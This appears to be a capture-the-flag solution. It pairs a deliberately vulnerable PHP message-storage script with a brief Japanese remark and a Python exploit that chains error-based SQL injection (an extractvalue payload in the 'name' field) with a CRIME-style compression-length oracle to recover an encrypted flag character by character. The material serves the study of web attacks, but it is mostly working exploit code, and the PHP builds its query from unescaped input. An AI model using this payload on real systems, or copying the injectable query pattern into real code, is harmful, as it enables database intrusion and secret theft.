<?php include "config.php"; $msg = $_POST['msg'] ?? ""; $name = $_POST['name'] ?? ""; if ( strlen($name) < 4 || strlen($msg) < 8 ) highlight_file(__FILE__) && exit(); $data = array( "name" => $name, "msg" => $msg, "flag" => "ACSC{" . $KEY . "}" // try to get this flag! ); $iv = openssl_random_pseudo_bytes(16); $data = gzcompress(json_encode($data)); $data = openssl_encrypt($data, 'aes-256-ctr', $KEY, OPENSSL_RAW_DATA, $iv); $data = bin2hex( $iv . $data ); $conn = new mysqli($HOST, $USER, $PASS, $NAME); $sql = sprintf("insert into msgs (msg, name) values('%s', '%s')", $data, $name); if (!$conn->query($sql)) die($conn->error); echo $conn->insert_id; $conn->close();
SQL injectionでオラクルをやりながらcrime attackをやる
import requests, string, sys URL = sys.argv[1] RPEFIX = 'ACSC' for _ in range(32): maps = {} for i in string.printable: guess = RPEFIX + i data = { 'name': 'orange', 'msg': guess + '|' + guess + "^" + guess } r = requests.post(URL, data=data) _id = int(r.text.strip('#')) data = { 'name': "1'^if(1=1, extractvalue('1',concat('~',(select length(msg) from (select * from msgs where id=%d)x))) ,1))-- " % _id, 'msg': 'noggnoggnogg' } r = requests.post(URL, data=data) length = r.text.split("~")[1].strip("'") maps[i] = int(length) which = min(maps, key=maps.get) RPEFIX = RPEFIX + which print(RPEFIX)